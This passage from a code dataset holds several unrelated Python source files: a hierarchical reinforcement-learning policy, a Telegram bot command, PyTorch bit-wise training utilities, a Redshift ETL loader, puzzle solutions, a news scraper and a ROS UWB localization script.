verbosity level: 0 none, 1 training information, 2 tensorflow\n debug\n tau : float\n target update rate\n gamma : float\n discount factor\n use_huber : bool\n specifies whether to use the huber distance function as the loss\n for the critic. If set to False, the mean-squared error metric is\n used instead\n l2_penalty : float\n L2 regularization penalty. This is applied to the policy network.\n model_params : dict\n dictionary of model-specific parameters. See parent class.\n target_entropy : float\n target entropy used when learning the entropy coefficient. If set\n to None, a heuristic value is used.\n num_levels : int\n number of levels within the hierarchy. Must be greater than 1. Two\n levels correspond to a Manager/Worker paradigm.\n meta_period : int or [int]\n meta-policy action period. For multi-level hierarchies, a separate\n meta period can be provided for each level (indexed from highest to\n lowest)\n intrinsic_reward_type : str\n the reward function to be used by the lower-level policies. See the\n base goal-conditioned policy for a description.\n intrinsic_reward_scale : [float]\n the value that the intrinsic reward should be scaled by. One for\n each lower-level.\n relative_goals : bool\n specifies whether the goal issued by the higher-levels policies is\n meant to be a relative or absolute goal, i.e. specific state or\n change in state\n off_policy_corrections : bool\n whether to use off-policy corrections during the update procedure.\n See: https://arxiv.org/abs/1805.08296\n hindsight : bool\n whether to include hindsight action and goal transitions in the\n replay buffer. See: https://arxiv.org/abs/1712.00948\n subgoal_testing_rate : float\n rate at which the original (non-hindsight) sample is stored in the\n replay buffer as well. 
Used only if `hindsight` is set to True.\n cooperative_gradients : bool\n whether to use the cooperative gradient update procedure for the\n higher-level policy. See: https://arxiv.org/abs/1912.02368v1\n cg_weights : float\n weights for the gradients of the loss of the lower-level policies\n with respect to the parameters of the higher-level policies. Only\n used if `cooperative_gradients` is set to True.\n cg_delta : float\n the desired lower-level expected returns. If set to None, a fixed\n Lagrangian specified by cg_weights is used instead. Only used if\n `cooperative_gradients` is set to True.\n pretrain_worker : bool\n specifies whether you are pre-training the lower-level policies.\n Actions by the high-level policy are randomly sampled from its\n action space.\n pretrain_path : str or None\n path to the pre-trained worker policy checkpoints\n pretrain_ckpt : int or None\n checkpoint number to use within the worker policy path. If set to\n None, the most recent checkpoint is used.\n total_steps : int\n Total number of timesteps used during training. Used by a subset of\n algorithms.\n \"\"\"\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.tau = tau\n self.gamma = gamma\n self.use_huber = use_huber\n\n super(GoalConditionedPolicy, self).__init__(\n sess=sess,\n ob_space=ob_space,\n ac_space=ac_space,\n co_space=co_space,\n buffer_size=buffer_size,\n batch_size=batch_size,\n actor_lr=actor_lr,\n critic_lr=critic_lr,\n verbose=verbose,\n tau=tau,\n gamma=gamma,\n use_huber=use_huber,\n l2_penalty=l2_penalty,\n model_params=model_params,\n num_levels=num_levels,\n meta_period=meta_period,\n intrinsic_reward_type=intrinsic_reward_type,\n intrinsic_reward_scale=intrinsic_reward_scale,\n relative_goals=relative_goals,\n off_policy_corrections=off_policy_corrections,\n hindsight=hindsight,\n subgoal_testing_rate=subgoal_testing_rate,\n cooperative_gradients=cooperative_gradients,\n cg_weights=cg_weights,\n cg_delta=cg_delta,\n scope=scope,\n env_name=env_name,\n pretrain_worker=pretrain_worker,\n pretrain_path=pretrain_path,\n pretrain_ckpt=pretrain_ckpt,\n total_steps=total_steps,\n num_envs=num_envs,\n meta_policy=FeedForwardPolicy,\n worker_policy=FeedForwardPolicy,\n additional_params=dict(\n target_entropy=target_entropy,\n ),\n )\n\n # ======================================================================= #\n # Auxiliary methods for HIRO #\n # ======================================================================= #\n\n def _log_probs(self, meta_actions, worker_obses, worker_actions):\n \"\"\"Calculate the log probability of the next goal by the meta-policies.\n\n Parameters\n ----------\n meta_actions : array_like\n (batch_size, m_ac_dim, num_samples) matrix of candidate higher-\n level policy actions\n worker_obses : array_like\n (batch_size, w_obs_dim, meta_period + 1) matrix of lower-level\n policy observations\n worker_actions : array_like\n (batch_size, w_ac_dim, meta_period) list of lower-level policy\n actions\n\n Returns\n -------\n array_like\n (batch_size, num_samples) fitness associated with every state /\n action / goal pair\n\n Helps\n -----\n * _sample_best_meta_action(self):\n \"\"\"\n fitness = []\n batch_size, goal_dim, num_samples = meta_actions.shape\n _, _, meta_period = worker_actions.shape\n\n # Loop through the elements of the batch.\n for i in range(batch_size):\n # Extract the candidate goals for the current element in the batch.\n # The worker observations and actions from the 
meta period of the\n # current batch are also collected to compute the log-probability\n # of a given candidate goal.\n goals_per_sample = meta_actions[i, :, :].T\n worker_obses_per_sample = worker_obses[i, :, :].T\n worker_actions_per_sample = worker_actions[i, :, :].T\n\n # This will be used to store the cumulative log-probabilities of a\n # given candidate goal for the entire meta-period.\n fitness_per_sample = np.zeros(num_samples)\n\n # Create repeated representations of each worker action for each\n # candidate goal.\n tiled_worker_actions_per_sample = np.tile(\n worker_actions_per_sample, (num_samples, 1))\n\n # Create repeated representations of each worker observation for\n # each candidate goal. The indexing of worker_obses_per_sample is\n # meant to do the following:\n # 1. We remove the last observation since it does not correspond\n # to any action for the current meta-period.\n # 2. Unlike the TD3 implementation, we keep the trailing context\n # (goal) terms since they are needed to compute the log-prob\n # of a given action when feeding to logp_action.\n tiled_worker_obses_per_sample = np.tile(\n worker_obses_per_sample[:-1, :], (num_samples, 1))\n\n # Create repeated representations of each candidate goal for each\n # worker observation in a meta period.\n tiled_goals_per_sample = np.tile(\n goals_per_sample, meta_period).reshape(\n (num_samples * meta_period, goal_dim))\n\n # If relative goals are being used, update the later goals to match\n # what they would be under the relative goals difference approach.\n if self.relative_goals:\n goal_diff = worker_obses_per_sample[:-1, :] - np.tile(\n worker_obses_per_sample[0, :], (meta_period, 1))\n tiled_goals_per_sample += \\\n np.tile(goal_diff, (num_samples, 1))[:, :goal_dim]\n\n # Compute the log-probability of each action using the logp_action\n # attribute of the SAC lower-level policy.\n normalized_error = self.sess.run(\n self.policy[-1].logp_action,\n feed_dict={\n self.policy[-1].obs_ph: tiled_worker_obses_per_sample,\n self.policy[-1].action_ph: tiled_worker_actions_per_sample,\n }\n )\n\n # Sum the different normalized errors to get the fitness of each\n # candidate goal.\n for j in range(num_samples):\n fitness_per_sample[j] = np.sum(\n normalized_error[j * meta_period: (j+1) * meta_period])\n\n fitness.append(fitness_per_sample)\n\n return np.array(fitness)\n\n # ======================================================================= #\n # Auxiliary methods for CHER #\n # ======================================================================= #\n\n def _setup_cooperative_gradients(self):\n \"\"\"Create the cooperative gradients meta-policy optimizer.\"\"\"\n raise NotImplementedError\n\n def _cooperative_gradients_update(self,\n obs0,\n actions,\n rewards,\n obs1,\n terminals1,\n level_num,\n update_actor=True):\n \"\"\"Perform the gradient update procedure for the CHER algorithm.\n\n This procedure is similar to update_from_batch, expect it runs the\n self.cg_optimizer operation instead of the policy object's optimizer,\n and utilizes some information from the worker samples as well.\n\n Parameters\n ----------\n obs0 : list of array_like\n (batch_size, obs_dim) matrix of observations for every level in the\n hierarchy\n actions : list of array_like\n (batch_size, ac_dim) matrix of actions for every level in the\n hierarchy\n obs1 : list of array_like\n (batch_size, obs_dim) matrix of next step observations for every\n level in the hierarchy\n rewards : list of array_like\n (batch_size,) vector of rewards for every 
level in the hierarchy\n terminals1 : list of numpy bool\n (batch_size,) vector of done masks for every level in the hierarchy\n level_num : int\n the hierarchy level number of the policy to optimize\n update_actor : bool\n specifies whether to update the actor policy of the meta policy.\n The critic policy is still updated if this value is set to False.\n\n Returns\n -------\n [float, float]\n higher-level policy critic loss\n float\n higher-level policy actor loss\n \"\"\"\n raise NotImplementedError\n","repo_name":"AboudyKreidieh/h-baselines","sub_path":"hbaselines/goal_conditioned/sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":13860,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"53"} +{"seq_id":"19277195059","text":"#from tgbots import UB, NB, MY_ID, BOT_ID, CONFIG\n\nfrom . import *\n\nlogger = logging.getLogger(__name__)\n\nfrom ..utils.telegram import my_popen, text2link, get_info_from_bot\n\n\n\nasync def _(event):\n logger.info(\"cmd {}: {}: {}\".format( __name__.split(\".\")[-1], event.sender_id, event.raw_text))\n client = event.client\n msg = event.message\n chat_id = event.chat_id\n\n cmd = await get_cmd(event)\n if len(cmd) == 1:\n info = await get_info_from_bot(\"/\"+\" \".join(cmd), uid=573173175, key=\"使用方式\")\n else:\n# info = await get_info_from_bot(\"/\"+\" \".join(cmd), uid=573173175, key=\"域名\")\n info = await get_info_from_bot(\"/\"+\" \".join(cmd), uid=573173175, skip=\"正在请求中\")\n if info:\n info += \"\\ntelegram bot: @WooMaiBot\"\n# info += \"\\n----\\n\"\n else:\n info = \"\"\n await cmd_answer(info, event)\n\n# if len(cmd) == 1:\n# elif len(cmd) == 2:\n# elif cmd[1] == \"down\":\n\n\ncmd = __name__.split(\".\")[-1]\nneed = need & ~CMD.is_admin\nCMD.add(_, cmd=cmd, need=need, forbid=forbid)\n","repo_name":"liqsliu/bot","sub_path":"telebot/tg_telethon/modules/gfwtest.py","file_name":"gfwtest.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5496607442","text":"\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.nn.functional as F\n\n# keep the device info, cuda for gpu use\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\ndef to_device(data, device):\n \"\"\"Move tensor(s) to chosen device\"\"\"\n if isinstance(data, (list, tuple)):\n return [to_device(x, device) for x in data]\n return data.to(device, non_blocking=True)\n\n\n\n@torch.no_grad()\ndef evaluate(model, val_loader):\n '''\n evaluate a model on val_loader data\n '''\n model.eval()\n outputs = [model.validation_step(batch) for batch in val_loader]\n return model.validation_epoch_end(outputs)\n\n\ndef get_lr(optimizer):\n '''\n return current learning rate of an optimizer\n '''\n for param_group in optimizer.param_groups:\n return param_group['lr']\n\ndef accuracy(outputs, labels):\n '''\n simple function to calculate accuracy\n '''\n _, preds = torch.max(outputs, dim=1)\n return torch.tensor(torch.sum(preds == labels).item() / len(preds))\n\n\nclass get_bit_representation(torch.autograd.Function):\n @staticmethod\n def forward(ctx, x):\n ctx.save_for_backward(x)\n return torch.sign(nn.ReLU()(x)) # ReLU return 0 if neg and x if not, sign returns 0 if 0 and 1 if pos\n\n @staticmethod\n def backward(ctx, grad_output): # custom grad identity function of the threshold\n x, = ctx.saved_tensors\n return grad_output\n\n\nclass get_sign(torch.autograd.Function):\n @staticmethod\n def forward(ctx, 
x):\n ctx.save_for_backward(x)\n return (-1) ** torch.sign(nn.ReLU()(x)) # returns 1 if 0 ( positif ) -1 if 0 ( negatif )\n\n @staticmethod\n def backward(ctx, grad_output): # custom grad identity function of the threshold\n x, = ctx.saved_tensors\n return -grad_output\n\n\ndef init_weight_bits(shape):\n a = np.sqrt(2 / np.prod(shape[:-1])) # He standard deviation\n nbits = shape[0]\n probs = a * np.random.normal(0, 1, shape) # get bit distribution\n\n # check exactly zero initialization ( proba <= 0 )\n # linear\n if len(shape) == 3:\n for i in range(shape[1]):\n for j in range(shape[2]):\n while np.all(probs[:-1, i, j] <= 0): # if all bits are 0 re calculate\n probs[:-1, i, j] = a * np.random.normal(0, 1, nbits - 1)\n\n # conv\n if len(shape) == 5:\n for in_channels in range(shape[3]):\n for out_channels in range(shape[4]):\n for i in range(shape[1]):\n for j in range(shape[2]):\n while np.all(probs[:-1, i, j, in_channels, out_channels] <= 0): # if all bits are 0 re calculate\n probs[:-1, i, j, in_channels, out_channels] = a * np.random.normal(0, 1, nbits - 1)\n\n return probs\n\n\ndef get_factor(k, target):\n current_std = np.std(k)\n\n if current_std == 0:\n print(\"standard deviation can't be zero\")\n return 1\n\n ampl = 1\n eps = 0.001\n min = 0\n max = ampl\n\n steps = 0\n while np.abs(current_std - target) / target > eps:\n qk = k * ampl\n current_std = np.std(qk)\n\n if current_std > target:\n max = ampl\n ampl = (max + min) / 2\n elif current_std < target:\n min = ampl\n ampl = (max + min) / 2\n steps += 1\n\n return ampl\n\n\ndef get_float_from_bits(signfunction, maskfunction, magnitude_block, sign_bit):\n \"\"\"\n returns the flaot value of the kernel\n \"\"\"\n if len(magnitude_block) == 0:\n magnitude = 1\n else:\n magnitude = 0\n for i in range(len(magnitude_block)): # for each magniture block we calculate the base 10 representation and sum them up\n magnitude += maskfunction.apply(magnitude_block[i]) * (2 ** i)\n # make kernel\n kernel = signfunction.apply(sign_bit) * magnitude # dont forget to multiply by the sign\n return kernel\n\n\ndef get_sparsity(k):\n \"\"\"\n returns the number of negative, zero and positive weights\n \"\"\"\n neg = np.count_nonzero(k < 0)\n zeros = np.count_nonzero(k == 0)\n pos = np.count_nonzero(k > 0)\n\n return neg, zeros, pos\n\n\ndef getNZP(net):\n\n \"\"\"\n returns the number of negative, zero and positive of a network net\n \"\"\"\n nsum = 0\n zsum = 0\n psum = 0\n\n for l in net.modules(): # for each module\n\n if isinstance(l, Conv2dBit) or isinstance(l, LinearBit): # if its an instance of Conv2Bit or Linear Bit\n neg, zero, pos = l.get_nzp() # get its nzp\n nsum += neg\n zsum += zero\n psum += pos\n\n return nsum, zsum, psum","repo_name":"abdxxw/Bit-wise-training-on-PyTorch","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34712802353","text":"from django.urls import path\n\nfrom .views import UnitList,UpdateBuilding, UpdateUnit\n\napp_name = 'building_app'\n\nurlpatterns = [\n path('/unit-list', UnitList.as_view(), name='unit_list'),\n path('/update-building', UpdateBuilding.as_view(), name='update_building'),\n path('/update-unit/', UpdateUnit.as_view(), 
name='update_unit'),\n]","repo_name":"mohammad-zavareh/building-management","sub_path":"building_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1974724942","text":"import configparser\nimport psycopg2\nfrom sql_queries import copy_table_queries, insert_table_queries\n\n\ndef load_staging_tables(cur, conn):\n    '''\n    This function loads the data from S3 into the staging tables\n    by executing the COPY queries\n    '''\n    for query in copy_table_queries:\n        cur.execute(query)\n        conn.commit()\n\n\ndef insert_tables(cur, conn):\n    '''\n    This function inserts the data from the staging tables into the dimensional\n    tables by executing the INSERT INTO queries\n    '''\n    for query in insert_table_queries:\n        cur.execute(query)\n        conn.commit()\n\n\ndef main():\n    '''\n    The main function reads the configuration file to connect to the Redshift cluster and\n    calls the load and insert functions\n    '''\n    \n    config = configparser.ConfigParser()\n    config.read('dwh.cfg')\n\n    conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n    cur = conn.cursor()\n    \n    load_staging_tables(cur, conn)\n    insert_tables(cur, conn)\n\n    conn.close()\n\n\nif __name__ == \"__main__\":\n    main()\n\n\n\n","repo_name":"ShorogNa/Data_Warhouse","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29891192508","text":"from typing import List\n\n\nclass Solution:\n    def jump(self, nums: List[int]) -> int:\n        n = len(nums)\n        reachability = list(range(n))\n        for i in range(n):\n            k = min(nums[i]+1,n-i)\n            for j in range(1,k):\n                reachability[i+j] = min(1 + reachability[i],reachability[i+j])\n        return reachability[-1]\n\nnums = [2,3,0,1,4] #breaks this!!\nout = Solution().jump(nums)\nprint(out)\n\n\n\n\"\"\"\nInteresting implementation for setting multiple values in the array if they are the same...\n\nclass Solution:\n    def jump(self, nums: List[int]) -> int:\n        l=len(nums)\n        if l==1: return 0\n        dp = [0] * l\n        f = 0\n        for i, n in enumerate(nums):\n            if i+n > f:\n                dp[f + 1:i + n + 1] = [dp[i] + 1] * (i + n - f)\n                f = i + n\n            if i+n >=l-1: break\n        return dp[-1]\n\n\n\"\"\"","repo_name":"Arnon120/leetcode","sub_path":"45. Jump Game II.py","file_name":"45. 
Jump Game II.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18340337886","text":"from typing import List\n\nimport torch\nimport torch.nn as nn\n\n\nclass MultiClassNet(nn.Module):\n    def __init__(self, input_channel: int, output_channel: int,\n                 channel_list: List[int] = None, dropout_p: float = 0.1):\n        \"\"\"\n        This Module is designed as a customized network for softmax distribution,\n        all fully connected layers and activation layers can be redesigned.\n\n        Args:\n            input_channel: the dimension number of the design matrix, aka number of signals.\n            output_channel: the dimension number of predicted values, aka number of values we want to predict.\n            channel_list: customize the intermediate channels for the first two layers, should have length=2,\n                because there are three layers in the network in total.\n            dropout_p: dropout ratio for the Dropout layer\n        \"\"\"\n        super(MultiClassNet, self).__init__()\n        self.input_channel = input_channel\n        self.output_channel = output_channel\n        if channel_list:\n            self.channel_list = channel_list\n        else:\n            # initialize default channel_list\n            self.channel_list = [input_channel * 2, output_channel * 2]\n        self.fc1 = torch.nn.Linear(input_channel, self.channel_list[0])\n        self.activation1 = nn.ReLU()\n        self.fc2 = torch.nn.Linear(self.channel_list[0], self.channel_list[1])\n        self.activation2 = nn.ReLU()\n        self.fc3 = torch.nn.Linear(self.channel_list[1], output_channel)\n        self.activation3 = nn.LogSoftmax(dim=1)\n        self.dropout = nn.Dropout(p=dropout_p)\n\n    def forward(self, x: torch.autograd.Variable) -> torch.autograd.Variable:\n        \"\"\"\n        Let input x go through the network in a customized sequence,\n        all layers can be reordered, make sure self.activation3 is the last layer\n\n        Args:\n            x: input value\n        Returns: network output\n        \"\"\"\n        x = self.fc1(x)\n        x = self.activation1(x)\n        x = self.dropout(x)\n        x = self.fc2(x)\n        x = self.activation2(x)\n        x = self.dropout(x)\n        x = self.fc3(x)\n        x = self.activation3(x)\n        return x\n\n","repo_name":"garyzccisme/ml-toolkit","sub_path":"feedforward_neural_network/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33286123151","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\n\nnums = list(i for i in range(1, n+1))\nanswers = []\n\ndef dfs(result, m):\n    if len(result) == m:\n        result = list(str(i) for i in result)\n        answers.append(\" \".join(result))\n\n        return\n\n    for num in nums:\n        result.append(num)\n        dfs(result, m)\n        result.pop()\n\nfor num in nums:\n    # initial condition for each case\n    result = [num]\n    dfs(result, m)\n\nfor ans in answers:\n    print(ans)\n    ","repo_name":"chulhee23/today_ps","sub_path":"BOJ/15000-19999/15651.py","file_name":"15651.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33386710320","text":"\r\n\r\nfrom collections import deque\r\nfrom pprint import pprint\r\n\r\nrealinput= open('input.10.txt','r',newline='\\n') \r\nlines=[x.strip() for x in realinput.readlines()]\r\n\r\ntstinput = '''[({(<(())[]>[[{[]{<()<>>\r\n[(()[<>])]({[<{<<[]>>(\r\n{([(<{}[<>[]}>{[]{[(<()>\r\n(((({<>}<{<{<>}{[]{[]{}\r\n[[<[([]))<([[{}[[()]]]\r\n[{[{({}]{}}([{[{{{}}([]\r\n{<[[]]>}<{[{[{[]{()[[[]\r\n[<(<(<(<{}))><([]([]()\r\n<{([([[(<>()){}]>(<<{{\r\n<{([{{}}[<[[[<>{}]]]>[]]\r\n'''\r\n#lines=[x.strip() for x 
in tstinput.splitlines()]\r\n#pprint(lines)\r\n\r\nopenchars=('(', '{', '[', '<')\r\nclosechars=(')', '}', ']', '>')\r\nlookup=dict(zip(closechars,openchars))\r\nscore={')':3, \r\n    ']':57,\r\n    '}': 1197,\r\n    '>':25137 }\r\n\r\ndef isNotValid(line):\r\n    stk = deque()\r\n    stk2 = deque()\r\n    for c in line:\r\n        if c in openchars:\r\n            stk.append(c)\r\n        elif c in closechars:\r\n            d = stk.pop()\r\n            # print(c,d)\r\n            if lookup[c] != d : \r\n                return c\r\n        else:\r\n            print(\"really bad\")\r\n    return False\r\n\r\n\r\ndef fix(line):\r\n    stk = deque()\r\n    for c in line:\r\n        if c in openchars:\r\n            stk.append(c)\r\n        elif c in closechars:\r\n            d = stk.pop()\r\n        else:\r\n            print(\"really bad\")\r\n    return stk\r\n# isValid(lines[0])\r\nfscore=0\r\nfor line in lines:\r\n    c=isNotValid(line)\r\n    if c:\r\n        print(c)\r\n        fscore = fscore + score[c]\r\n\r\nprint('part1: ',fscore)\r\nlines = [l for l in lines if not isNotValid(l)]\r\n\r\nscore2 = {\r\n    '(': 1 , \r\n    '[': 2 ,\r\n    '{': 3 ,\r\n    '<': 4 }\r\n\r\nresult=[]\r\nfor line in lines:\r\n    fscore=0\r\n    f =fix(line)\r\n    #rint (line, ' ', f)\r\n    while len(f):\r\n        fscore= 5*fscore + score2[f.pop()]\r\n    result.append(fscore)\r\n\r\nr = sorted(result)\r\nprint(r[int(len(r)/2)])\r\n","repo_name":"zmola/aoc","sub_path":"2021/day.10.py","file_name":"day.10.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7874465175","text":"# -*- coding: utf-8 -*-\nimport os\nfrom sqlalchemy import Table\nfrom models.mysql.system import db_engine, meta\n\nroot_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef main():\n    full_name = os.path.join(root_path, 'models/mysql.py')\n\n    with open(full_name, 'w') as f:\n        f.write('# -*- coding: utf-8 -*-\\r\\n\\r\\n')\n        f.write('from sqlalchemy import Table, select\\r\\n')\n        f.write('from utils.my_sql import Mysql\\r\\n\\r\\n')\n        f.write('mysql_obj = Mysql()\\r\\n')\n        f.write('meta = mysql_obj.meta\\r\\n')\n        f.write('db_engine = mysql_obj.db_engine\\r\\n\\r\\n')\n\n        table_list = db_engine.table_names()\n        print(table_list)\n        for table_name in table_list:\n            tmp_table = Table(table_name, meta, autoload=True, autoload_with=db_engine)\n            # table comment\n            f.write('# ' + tmp_table.comment.replace(r'\\r\\n', '') + '\\r\\n')\n            # define the table\n            f.write('{table_name} = Table(\"{table_name}\", meta, autoload=True, autoload_with=db_engine)\\r\\n\\r\\n'.format(table_name=table_name))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jicao56/normalAdmin","sub_path":"bin/models_mysql_update.py","file_name":"models_mysql_update.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35292844316","text":"from datetime import datetime, timedelta\nimport boto3\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\n\ntiempoURL = \"https://www.eltiempo.com\"\npublimetroURL = \"https://www.publimetro.co\"\n\ndef dowloand_structure(periodic):\n    today = datetime.now()\n    year=today.year\n    month=today.month\n    day=today.day\n    archivo=f'{periodic}.html'\n    ruta=f'headlines/raw/periodico={periodic}/year={year}/month={month}/day={day}/{periodic}.html'\n    s3 = boto3.resource('s3')\n    s3.meta.client.download_file('newspaperstructure', ruta, f'/tmp/{periodic}.html')\n\ndowloand_structure('El_Tiempo')\ndowloand_structure('Publimetro')\nfile = open(r'/tmp/El_Tiempo.html',\"r\",encoding='utf-8')\ntiempoBS = BeautifulSoup(file.read(), 'html.parser')\nfile = 
open(r'/tmp/Publimetro.html',\"r\",encoding='utf-8')\npublimetroBS = BeautifulSoup(file.read(), 'html.parser')\n\n\n\ndef normalize(s): #Function to replace accented vowels with unaccented ones\n    replacements = (\n        (\"á\", \"a\"),\n        (\"é\", \"e\"),\n        (\"í\", \"i\"),\n        (\"ó\", \"o\"),\n        (\"ú\", \"u\"),\n    )\n    for a, b in replacements:\n        s = s.replace(a, b).replace(a.upper(), b.upper())\n    return s\n\n# Lists\ntitles = list()\ncategories = list()\nurls = list()\n\ndef newsTitles (titleClass, nested_a = False):\n    for title in titleClass:\n        if nested_a:\n            titleScraped = title.find('a')\n            titles.append(titleScraped.text)\n        else: titles.append(title.text)\n\ndef newsCategories (categoryClass, newspaper = \"\", nested_a = False):\n    for category in categoryClass:\n        if nested_a:\n            scrapedCategory = category.find('a')['href']\n        else:\n            scrapedCategory = category.get('href','')\n        txt = scrapedCategory.split(sep='/')\n        if newspaper == \"PB\":\n            if len(txt) > 2:\n                if txt[0] == \"https:\": categories.append(\"banner publicitario\")\n                else: categories.append(txt[1])\n            else: categories.append(\"No category\")\n        else: categories.append(txt[1]+\"/\"+txt[2])\n\n\ndef newsUrls (urlClass, newspaper = \"\", nested_a = False):\n    for url in urlClass: \n        if nested_a:\n            scrapedURL = url.find('a')['href']\n        else:\n            scrapedURL = url.get('href','')\n        if newspaper == \"ET\": urls.append(tiempoURL+scrapedURL)\n        else: urls.append(publimetroURL+scrapedURL)\n\n\ndef generateCSV(categories, titles, urls, fileName):\n    print(len(categories),len(titles), len(urls))\n    fields = ['Category', 'Title', 'Url']\n    rows = []\n\n    for i in range(len(categories)):\n        row = [categories[i], titles[i], urls[i]]\n        rows.append(row)\n\n    with open(f'/tmp/{fileName}', 'w', encoding=\"utf-8\") as f:\n        write = csv.writer(f)\n        write.writerow(fields)\n        write.writerows(rows)\n    print(\"Scraping successful.\\nFinal file: \", fileName)\n\n    titles.clear()\n    categories.clear()\n    urls.clear()\n\ndef saveS3(filename):\n    nameNews=filename.replace('.csv','')\n    today = datetime.now()\n    year=today.year\n    month=today.month\n    day=today.day\n    urlsave= f'headlines/final/periodico={nameNews}/year={year}/month={month}/day={day}/{filename}'\n    s3 = boto3.resource('s3')\n    s3.meta.client.upload_file(f'/tmp/{filename}', 'csvnews',urlsave)\n\n\n\"\"\" El Tiempo \"\"\"\ncommunET = tiempoBS.find_all('a', class_='title')\n\n# Begins the scraping for \"El Tiempo\"\nnewsTitles(communET)\nnewsCategories(communET, \"ET\")\nnewsUrls(communET, \"ET\")\nfilename='El_Tiempo.csv'\ngenerateCSV(categories, titles, urls, filename)\nsaveS3(filename)\n\n\"\"\" Publimetro \"\"\"\ntitleClassv1 = publimetroBS.find_all('a', class_='headline')\ntitleClassv2 = publimetroBS.find_all('a', class_='card-list--headline-link')\ntitleClassv3 = publimetroBS.find_all('a', class_='sm-promo-headline')\ntitleClassv4 = publimetroBS.find_all('div', class_='results-list--headline-container')\ntitleClass = [titleClassv1, titleClassv2, titleClassv3, titleClassv4]\n\n# Begins the scraping for \"Publimetro\"\nneasted = False\nfor titleList in titleClass:\n    if titleClass[3] == True: neasted = True\n    newsTitles(titleList, nested_a = neasted)\n    newsCategories(titleList, newspaper=\"PB\", nested_a = neasted)\n    newsUrls(titleList, nested_a = neasted)\nfilename='Publimetro.csv'\ngenerateCSV(categories, titles, urls,filename)\nsaveS3(filename)\n\n","repo_name":"FelipeVelasquezP/ETL_Scraping_Kafla","sub_path":"Punto 
1/make_CSV_newspaper.py","file_name":"make_CSV_newspaper.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73721252967","text":"import rospy\nimport tf\nimport localization as lx\nimport serial\n\ndef get_transform(id):\n try:\n (trans,rot) = listener.lookupTransform('/map', id, rospy.Time(0))\n return trans\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n pass\n\ndef get_tag_location(anchors, ranges, transforms):\n P = lx.Project(mode=\"3D\",solver=\"LSE\")\n\n #define anchor locations\n for i in range(REQ_ANCHOR):\n P.add_anchor(anchors[i], transforms[i])\n t, label = P.add_target()\n\n #define anchor ranges\n for i in range(REQ_ANCHOR):\n t.add_measure(anchors[i], ranges[i])\n\n P.solve()\n B = t.loc\n return {'x':B.x, 'y':B.y, 'z':B.z}\n\ndef is_listed(anchors, id):\n for anchor in anchors:\n if anchor == id:\n return True\n else:\n pass\n\ndef get_serial_data():\n start = ser.read()\n # return ser.readline().strip('$\\r\\n').split(',')\n # expected data from the serial port is: $,,\\r\\n\n if start == '$':\n parsed_data = ser.readline().strip('\\r\\n').split(',')\n # anchor id is stored in index 0 - parsed_data[0]\n # range is stored in index 1 - parsed_data[1]\n return parsed_data\n else:\n return None\n\nif __name__ == '__main__':\n\n rospy.init_node('ros_dwm1000')\n listener = tf.TransformListener()\n start_time = rospy.get_time()\n\n #create rosparameters\n MIN_RANGE = rospy.get_param('/ros_dwm1000/min_range', 0.5)\n MAX_RANGE = rospy.get_param('/ros_dwm1000/max_range', 10.0)\n REQ_ANCHOR = rospy.get_param('/ros_dwm1000/req_anchor', 3)\n FRAME_ID = rospy.get_param('/ros_dwm1000/frame_id', 'uwb_tag')\n SERIAL_PORT = rospy.get_param('/ros_dwm1000/serial_port', '/dev/ttyUSB0')\n\n #rosparam logs just to make sure parameters kicked in\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/min_range'), MIN_RANGE)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/max_range'), MAX_RANGE)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/req_anchor'), REQ_ANCHOR)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/frame_id'), FRAME_ID)\n rospy.loginfo(\"%s is %s\", rospy.resolve_name('/ros_dwm1000/serial_port'), SERIAL_PORT)\n\n ser = serial.Serial(SERIAL_PORT, 115200)\n ser.timeout = None\n rospy.loginfo(\"Connected to %s\", ser.portstr)\n\n #lists to store anchors found\n ranges = []\n anchors = []\n transforms = []\n anchors_found = 0\n\n while not rospy.is_shutdown():\n #get the stream of data from the tag through the serial port\n parsed_data = get_serial_data()\n\n # print parsed_data\n if None != parsed_data:\n #check if the current range is within specified 